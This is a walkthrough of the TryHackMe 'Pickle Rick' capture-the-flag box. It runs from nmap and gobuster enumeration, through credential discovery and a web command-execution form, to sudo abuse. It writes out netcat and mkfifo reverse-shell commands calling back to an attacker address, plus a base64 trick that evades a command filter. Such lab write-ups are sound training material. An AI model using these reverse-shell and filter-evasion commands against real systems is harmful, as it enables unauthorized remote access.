Pickle Rick is a TryHackMe CTF requiring you to exploit a web-server in order to find 3 ingredients.
[Task 1] Pickle Rick
What is the first ingredient Rick needs?
Browsing to home page
Lets start out by browsing to the IP, we’ve already been told the box is a web server, it’s probably safe to assume that there might a web site.
Browsing to the site you find an amusing Rick and Morty-based homepage telling you that you need to log in the computer to retrieve 3 ingredients.
On further inspection of the page source, you’ll find comment near the closing
Note to self, remember username! Username: R1ckRul3s
Running enumeration scripts
Nothing particularly interesting here, for now. Just further affirmation that there is a web-server, and there’s an SSH port that’s open. Which, we’ll be exploiting later on I imagine.
kali@kali:~/Desktop/TryHackMe/picklerick$ nmap -sV -sC 10.10.3.141 -oA nmap.txt Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-13 09:21 EDT Nmap scan report for target.thm (10.10.3.141) Host is up (0.021s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 35:9f:5b:ab:b1:49:3d:27:a1:b2:5e:e6:68:31:36:f0 (RSA) | 256 46:c6:60:c2:f9:86:73:e9:b7:b9:d9:b3:0a:ed:9b:89 (ECDSA) |_ 256 a9:4c:47:2f:0f:fb:15:65:95:22:c2:85:f6:66:a9:2d (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Rick is sup4r cool Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
gobuster can reveal more about the application.
kali@kali:~/Desktop/TryHackMe/picklerick$ gobuster dir --url http://target.thm --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://target.thm [+] Threads: 100 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Timeout: 10s =============================================================== 2020/09/13 09:24:29 Starting gobuster =============================================================== /assets (Status: 301) /server-status (Status: 403) =============================================================== 2020/09/13 09:25:31 Finished ===============================================================
The above GoBuster run was pretty sparce, so I ran another, this time enumerating files with extensions
kali@kali:~/Desktop/TryHackMe/picklerick$ gobuster dir --url http://target.thm --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --threads 100 --extensions htm,php,txt,rar,zip,db,cfg,js --expanded --followredirect =============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: http://target.thm [+] Threads: 100 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Extensions: htm,php,txt,rar,zip,db,cfg,js [+] Follow Redir: true [+] Expanded: true [+] Timeout: 10s =============================================================== 2020/09/13 09:28:52 Starting gobuster =============================================================== http://target.thm/login.php (Status: 200) http://target.thm/assets (Status: 200) http://target.thm/portal.php (Status: 200) http://target.thm/robots.txt (Status: 200)
In this case, we found 3 important points:
Digging into enumerated information
This a login page, with a post form that sends the following params
This page redirects to
.login.php, likley because we’re not logged in. We may have to bruteforce the login form with
A malformed robots file. It contains a singular text line:
Could this be the password for the login page?
Attempting to login with enumerated data
We’ll be testing the following credentials that we’ve pulled so far:
And fortunately, it works!
Now that we’re in the Portal, we dig around.
Command execution form
The first thing we see on
portal.php is the “command execution” input box. Lets test this, to see what commands it runs. Preferrably it’ll be some server side command execution; bash, or PHP.
Lets try running
ls -lah and see if we can pull a directory listing.
And we can confirm the form does execute bash script, and get the output:
total 40K drwxr-xr-x 3 root root 4.0K Feb 10 2019 . drwxr-xr-x 3 root root 4.0K Feb 10 2019 .. -rwxr-xr-x 1 ubuntu ubuntu 17 Feb 10 2019 Sup3rS3cretPickl3Ingred.txt drwxrwxr-x 2 ubuntu ubuntu 4.0K Feb 10 2019 assets -rwxr-xr-x 1 ubuntu ubuntu 54 Feb 10 2019 clue.txt -rwxr-xr-x 1 ubuntu ubuntu 1.1K Feb 10 2019 denied.php -rwxrwxrwx 1 ubuntu ubuntu 1.1K Feb 10 2019 index.html -rwxr-xr-x 1 ubuntu ubuntu 1.5K Feb 10 2019 login.php -rwxr-xr-x 1 ubuntu ubuntu 2.0K Feb 10 2019 portal.php -rwxr-xr-x 1 ubuntu ubuntu 17 Feb 10 2019 robots.txt
After further attempted exploitation, I tried to run:
cat Sup3rS3cretPickl3Ingred.txt; echo; cat clue.txt; echo; whoami; echo; ps -aux; groups
Which returns Command disabled to make it hard for future PICKLEEEE RICCCKKKK. (¬.¬) ….
Fortunately the command input is only temporarily disabled. And after a little fiddling around find that it’s the
cat command that’s disabled. Though, interestingly the error message’s source does contain some type of hashed data?
whoami command let me know that we’re running as
ls /home command shows there are two users with directories there:
Trying to get a reverse netcat shell
I’d tried to figure out what the hell the above hash was, but to no avail, so lets see if we can get a reverse shell on the machine and get a more interactive interface to toy around with.
We’ll need to listen for connections on our attacker machine.
# On the attacker machine nc -lvp 4444
# On the victim machine, run netcat, and on connect, create a shell nc 10.11.8.219 4444 -e /bin/sh
The connection failed, which could be down to the version of netcat. So I ran
man netcat via the portal input. Which returned a hint on how to bypass this:
There is no -c or -e option in this netcat, but you still can execute a command after connection being established by redirecting file descrip- tors. Be cautious here because opening a port and let anyone connected execute arbitrary command on your site is DANGEROUS. If you really need to do this, here is an example: On 'server' side: $ rm -f /tmp/f; mkfifo /tmp/f $ cat /tmp/f | /bin/sh -i 2>&1 | nc 10.11.8.219 4444 > /tmp/f
We can’t use the
cat command for a return; but, it may still execute on the victim box, so lets test it at least.
# Run first, to create the mkfifo rm -f /tmp/f; mkfifo /tmp/f; # Run second, for reverse shell cat /tmp/f | /bin/sh -i 2>&1 | nc 10.11.8.219 4444 > /tmp/f;
Unfortunately we failed once again. I’m wondering at this point whether to:
a. Create shell script
shell.sh and echo the …Run second… part from above into it, then run that.
b. Create a PHP based shell, upload it to
/var/www/html and just execute it.
I’ll go with option A first, then test B.
Shell attempt #1 (shell script)
To save time, I can determine if it’s actally the word
cat that’s causing the remote execution to fail.
echo 'cat'; if this fails, then we can skip to option B.
And fortunately-kinda, it fails. So looks like we should try another route.
Shell attempt #2 (php script)
First we need to determine if we can
wget files. If we can, we’ll set up a
python3 -m http.server on our attacker machine, create a PHP shell, upload it to
/var/www/html/... then execute it by browsing to the file.
wget doesn’t seem to return any response.
Shell attempt #3 (shell script hacky)
We can’t run the
cat command, but, we might be able to echo
ca, and then
t blah blah blah into a script file that we execute. That way, we avoid inputting and explicit
cat into our command.
We don’t have write access in
sudo -l, our current user seems to have some funky permissions too. I’m unsure as to how to exploit this for the time being, but lets dive deeper and find our where we can write a shell to.
Matching Defaults entries for www-data on ip-10-10-3-141.eu-west-1.compute.internal: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on ip-10-10-3-141.eu-west-1.compute.internal: (ALL) NOPASSWD: ALL
It really feels like we should have write access in
/var/www/html, but lets try somewhere else. The classic
/tmp directory is usually spankable.
touch /tmp/x.sh; ls -lah /tmp; x.sh
Success, we can create a shell script here, now lets try our hacky
# first we'll print 'ca' to the file, then the rest printf 'ca' > /tmp/x.sh; ls -lah /tmp/x.sh | grep x.sh; # we can see that bytes are added to the file! # and the rest... printf 't /tmp/f | /bin/sh -i 2>&1 | nc -l 10.11.8.219 4444 > /tmp/f;' >> /tmp/x.sh; ls -lah /tmp/x.sh | grep x.sh; # fingers crossed this'll run! # then try run the script with sudo sudo sh /tmp/x.sh; # if that fails try normal shell exec sh /tmp/x.sh;
This unfortunately failed; but lets test if the shell script actually runs? It may be an error on our behalf.
touch /tmp/y.sh; printf 'touch /tmp/works.txt; whoami | printf > /tmp/works.txt;' > /tmp/y.sh; sudo sh /tmp/y.sh; ls -lah /tmp/;
The script is running as
root, so we’re really close. See the
total 40K drwxrwxrwt 8 root root 4.0K Sep 13 14:33 . drwxr-xr-x 23 root root 4.0K Sep 13 12:50 .. drwxrwxrwt 2 root root 4.0K Sep 13 12:50 .ICE-unix drwxrwxrwt 2 root root 4.0K Sep 13 12:50 .Test-unix drwxrwxrwt 2 root root 4.0K Sep 13 12:50 .X11-unix drwxrwxrwt 2 root root 4.0K Sep 13 12:50 .XIM-unix drwxrwxrwt 2 root root 4.0K Sep 13 12:50 .font-unix prw-r--r-- 1 www-data www-data 0 Sep 13 14:04 f drwx------ 3 root root 4.0K Sep 13 12:50 systemd-private-a938bdfc8fce449a9ca1d228a57f00d8-systemd-timesyncd.service-oSRCc2 -rw-r--r-- 1 root root 0 Sep 13 14:33 works.txt -rw-r--r-- 1 www-data www-data 63 Sep 13 14:30 x.sh -rw-r--r-- 1 www-data www-data 55 Sep 13 14:33 y.sh
It seems like it’s the
printf that didn’t work, as there’re no bytes in the file. Lets try
touch /tmp/y.sh; echo 'touch /tmp/works2.txt; whoami | echo > /tmp/works2.txt;' > /tmp/y.sh; sudo sh /tmp/y.sh; ls -lah /tmp/;
Hmm. As we DO have root. Let’s see if we can steal some SSH files from either
Stealing SSH files instead..
We know we can perform route actions, we just can’t use
head .etc … Little bit annoying, but, we do have more options. Lets see if there are some SSH keys we can acquire.
sudo ls -lah /home/rick
And heh, we’ve found the
second ingredient file at least…
Though, the aren’t any SSH files for rick.
ls -lah /ubuntu/.ssh has also been wiped. Annoyingly.
Lets get dirty, and create an encoded script
I’m going to encode the previous script with base64, then on the victim machine, decode the text into our shell script…
# on attacker machine echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.8.219 4444 >/tmp/f' | base64;
We get the following output… which isn’t quite right.
# base64 script for victim... cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTAu MTEuOC4yMTkgNDQ0NCA+L3RtcC9mCg==
Lets chunk it down so we don’t have a funky link break…
echo 'rm /tmp/f;mkfifo /tmp/f;' | base64;
echo 'cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.8.219 4444 >/tmp/f;' | base64;
kali@kali:~/Desktop/TryHackMe/picklerick$ echo 'rm /tmp/f;mkfifo /tmp/f;' | base64; cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Cg== kali@kali:~/Desktop/TryHackMe/picklerick$ echo 'cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.8.219 4444 >/tmp/f;' | base64; Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTAuMTEuOC4yMTkgNDQ0NCA+L3RtcC9mOwo=
And run this on victim machine
touch /tmp/a.sh; echo 'cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Cg==' | base64 -d > /tmp/a.sh; echo 'Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTAuMTEuOC4yMTkgNDQ0NCA+L3RtcC9mOwo=' | base64 -d >> /tmp/a.sh; sudo sh /tmp/a.sh;
We then we get root on our netcat!
kali@kali:~/Desktop/TryHackMe/picklerick$ nc -lvp 4444 listening on [any] 4444 ... connect to [10.11.8.219] from target.thm [10.10.70.157] 42390 /bin/sh: 0: can't access tty; job control turned off # whoami root
Now to explore and, finally,
cat the files we were looking for.
Exploiting root shell
We can now read the first ingredient that Risk needs
# cat Sup3rS3cretPickl3Ingred.txt
Whats the second ingredient Rick needs?
We stumbled on this earlier, it’s tucked away in the
# cd /home/rick # ls second ingredients # cat 'second ingredients'
Whats the final ingredient Rick needs?
There’s nothing in the
/home/rick directory, so lets explore further.
/home/ubuntu directory seems empty at first, but on running
ls -lah, we find there’s a
.bash_history file, which, contains a reference to the last ingredient.
That was a good box.